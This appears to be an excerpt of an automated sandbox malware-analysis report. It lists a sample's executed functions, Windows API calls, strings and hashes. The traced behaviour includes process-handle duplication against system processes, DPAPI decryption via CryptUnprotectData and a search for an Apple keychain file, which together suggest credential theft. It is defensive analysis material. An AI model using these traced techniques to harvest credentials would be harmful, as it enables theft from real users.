40026->39995 40027->39995 40028->39995 40035 41b812 40029->40035 40030 415a6d memset 40031 41b8c2 40030->40031 40032 41b980 40031->40032 40033 41b902 memcpy memcpy memcpy memcpy memcpy 40031->40033 40038 41b849 40031->40038 40040 41b9ad 40032->40040 40046 4151e3 40032->40046 40033->40032 40035->40038 40042 41b884 40035->40042 40045 444706 11 API calls 40035->40045 40037 41ba12 40037->40038 40039 41ba32 memset 40037->40039 40038->40006 40039->40038 40040->40038 40049 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40040->40049 40042->40030 40042->40038 40043->40013 40044->40002 40045->40042 40050 41837f 40046->40050 40049->40037 40051 4183c1 40050->40051 40052 4183ca 40050->40052 40053 418197 25 API calls 40051->40053 40054 418160 11 API calls 40052->40054 40055 4151f9 40052->40055 40053->40052 40056 4183e5 40054->40056 40055->40040 40056->40055 40057 41739b GetVersionExW 40056->40057 40058 418440 40057->40058 40059 418444 CreateFileW 40058->40059 40060 41845f CreateFileA 40058->40060 40061 418477 40059->40061 40060->40061 40062 4184c2 memset 40061->40062 40063 41847e GetLastError free 40061->40063 40067 418758 46 API calls 40062->40067 40064 4184b5 40063->40064 40065 418497 40063->40065 40069 444706 11 API calls 40064->40069 40068 41837f 49 API calls 40065->40068 40070 418506 free 40067->40070 40068->40055 40069->40055 40070->40055 40071->39844 40072->39848 40074 425108 40073->40074 40080 42510d 40073->40080 40118 424f74 124 API calls 40074->40118 40077 42516e 40119 415c7d 16 API calls 40077->40119 40078 425115 40078->39850 40080->40078 40086 42569b 40080->40086 40081->39850 40082->39850 40083->39858 40084->39857 40085->39848 40098 4256f1 40086->40098 40114 4259c2 40086->40114 40088 429ac1 40113 425ad6 40088->40113 40136 415c56 11 API calls 40088->40136 40092 4260dd 40131 424251 120 API calls 40092->40131 40096 422aeb memset memcpy memcpy 40096->40098 40097 429a4d 40100 429a66 40097->40100 40101 429a9b 40097->40101 40098->40088 40098->40096 40098->40097 40103 4260a1 40098->40103 40112 4259da 40098->40112 40098->40114 40117 425a38 40098->40117 40120 4227f0 memset memcpy 40098->40120 40121 422b84 15 API calls 40098->40121 40122 422b5d memset memcpy memcpy 40098->40122 40123 422640 13 API calls 40098->40123 40125 4241fc 11 API calls 40098->40125 40126 42413a 90 API calls 40098->40126 40132 415c56 11 API calls 40100->40132 40102 429a96 40101->40102 40134 416760 11 API calls 40101->40134 40135 424251 120 API calls 40102->40135 40129 415c56 11 API calls 40103->40129 40105 429a7a 40133 416760 11 API calls 40105->40133 40130 416760 11 API calls 40112->40130 40113->40077 40114->40113 40124 415c56 11 API calls 40114->40124 40117->40114 40127 422640 13 API calls 40117->40127 40128 4226e0 12 API calls 40117->40128 40118->40080 40119->40078 40120->40098 40121->40098 40122->40098 40123->40098 40124->40112 40125->40098 40126->40098 40127->40117 40128->40117 40129->40112 40130->40092 40131->40113 40132->40105 40133->40102 40134->40102 40135->40088 40136->40112 40137->39228 40138->39236 40139 41493c EnumResourceNamesW 40140 44660a 40143 4465e4 40140->40143 40142 446613 40144 4465f3 __dllonexit 40143->40144 40145 4465ed _onexit 40143->40145 40144->40142 40145->40144

                                                                              Executed Functions

                                                                              Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040DDAD
                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                              • CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                              • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                              • memset.MSVCRT ref: 0040DF5F
                                                                              • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                              • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                              • API String ID: 708747863-3398334509
                                                                              • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                              • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                              Function 00413D4C Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                              • memset.MSVCRT ref: 00413D7F
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                              • memset.MSVCRT ref: 00413E07
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                              • CloseHandle.KERNELBASE(?), ref: 00413EA8
                                                                              • free.MSVCRT ref: 00413EC1
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                              • API String ID: 3536422406-1740548384
                                                                              • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                              • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                              Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 623 40b58d-40b59e 624 40b5a4-40b5c0 GetModuleHandleW FindResourceW 623->624 625 40b62e-40b632 623->625 626 40b5c2-40b5ce LoadResource 624->626 627 40b5e7 624->627 626->627 628 40b5d0-40b5e5 SizeofResource LockResource 626->628 629 40b5e9-40b5eb 627->629 628->629 629->625 630 40b5ed-40b5ef 629->630 630->625 631 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 630->631 631->625
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                              • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                              • String ID: AE$BIN
                                                                              • API String ID: 1668488027-3931574542
                                                                              • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                              • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                              Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 767404330-0
                                                                              • Opcode ID: c4d4f020b90e859bc6bc15c56e0cdb0905d1a3ad4ff77b848f90db8d1e9fca36
                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                              • Opcode Fuzzy Hash: c4d4f020b90e859bc6bc15c56e0cdb0905d1a3ad4ff77b848f90db8d1e9fca36
                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                              Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$FirstNext
                                                                              • String ID:
                                                                              • API String ID: 1690352074-0
                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                              Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0041898C
                                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystemmemset
                                                                              • String ID:
                                                                              • API String ID: 3558857096-0
                                                                              • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                              • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                              Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 6 4455a8-4455e3 memset call 403988 wcsrchr 3->6 7 4457fb 3->7 40 44558e-445594 call 444b06 4->40 41 44557e-445580 call 4136c0 4->41 15 4455e5 6->15 16 4455e8-4455f9 6->16 10 445800-445809 7->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 43 445823-445826 14->43 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 51 445879-44587c 18->51 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 79 445685 21->79 80 4456b2-4456b5 call 40b1ab 21->80 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 141 44592d-445945 call 40b6ef 24->141 142 44594a 24->142 45 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->45 46 445b29-445b32 28->46 146 4459d0-4459e8 call 40b6ef 29->146 147 4459ed 29->147 30->21 39 445609-44560d 30->39 31->30 39->21 49 44560f-445641 call 4087b3 call 40a889 call 4454bf 39->49 40->3 66 445585-44558c call 41366b 41->66 52 44584c-445854 call 40b1ab 43->52 53 445828 43->53 184 445b08-445b15 call 40ae51 45->184 54 445c7c-445c85 46->54 55 445b38-445b96 memset * 3 46->55 157 445665-445670 call 40b1ab 49->157 158 445643-445663 call 40a9b5 call 4087b3 49->158 67 4458a2-4458aa call 40b1ab 51->67 68 44587e 51->68 52->13 69 44582e-445847 call 40a9b5 call 4087b3 53->69 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 70 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->70 71 445b98-445ba0 55->71 84 445fae-445fb2 63->84 85 445d2b-445d3b 63->85 163 445cf5 64->163 164 445cfc-445d03 64->164 66->40 67->19 77 445884-44589d call 40a9b5 call 4087b3 68->77 144 445849 69->144 247 445c77 70->247 71->70 78 445ba2-445bcf call 4099c6 call 445403 call 445389 71->78 149 44589f 77->149 78->54 94 44568b-4456a4 call 40a9b5 call 4087b3 79->94 111 4456ba-4456c4 80->111 99 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 85->99 100 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 85->100 151 4456a9-4456b0 94->151 169 445d67-445d6c 99->169 170 445d71-445d83 call 445093 99->170 194 445e17 100->194 195 445e1e-445e25 100->195 124 4457f9 111->124 125 4456ca-4456d3 call 413cfa call 413d4c 111->125 124->7 177 4456d8-4456f7 call 40b2cc call 413fa6 125->177 141->142 142->23 144->52 146->147 147->28 149->67 151->80 151->94 157->111 158->157 163->164 174 445d05-445d13 164->174 175 445d17 164->175 179 445fa1-445fa9 call 40b6ef 169->179 170->84 174->175 175->63 208 4456fd-445796 memset * 4 call 409c70 * 3 177->208 209 4457ea-4457f7 call 413d29 177->209 179->84 198 445b17-445b27 call 40aebe 184->198 199 445aa3-445ab0 call 40add4 184->199 194->195 200 445e27-445e59 call 40b2cc call 409d1f call 409b98 195->200 201 445e6b-445e7e call 445093 195->201 198->46 199->184 223 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 199->223 242 445e62-445e69 200->242 243 445e5b 200->243 222 445f67-445f99 call 40b2cc call 409d1f call 409b98 201->222 208->209 246 445798-4457ca call 40b2cc call 409d1f call 409b98 208->246 209->10 222->84 254 445f9b 222->254 223->184 242->201 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->209 264 4457cc-4457e5 call 4087b3 246->264 247->54 265 445f4d-445f5a call 40ae51 248->265 254->179 264->209 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->222 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004455C2
                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                              • memset.MSVCRT ref: 0044570D
                                                                              • memset.MSVCRT ref: 00445725
                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                              • memset.MSVCRT ref: 0044573D
                                                                              • memset.MSVCRT ref: 00445755
                                                                              • memset.MSVCRT ref: 004458CB
                                                                              • memset.MSVCRT ref: 004458E3
                                                                              • memset.MSVCRT ref: 0044596E
                                                                              • memset.MSVCRT ref: 00445A10
                                                                              • memset.MSVCRT ref: 00445A28
                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                              • memset.MSVCRT ref: 00445B52
                                                                              • memset.MSVCRT ref: 00445B6A
                                                                              • memset.MSVCRT ref: 00445C9B
                                                                              • memset.MSVCRT ref: 00445CB3
                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                              • memset.MSVCRT ref: 00445B82
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                              • memset.MSVCRT ref: 00445986
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                              • API String ID: 4101496090-3798722523
                                                                              • Opcode ID: 996140e6ccd422487fd81670db3a520017ce6680b76ca4f8d5fcb996192b84c6
                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                              • Opcode Fuzzy Hash: 996140e6ccd422487fd81670db3a520017ce6680b76ca4f8d5fcb996192b84c6
                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                              Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044D5
                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
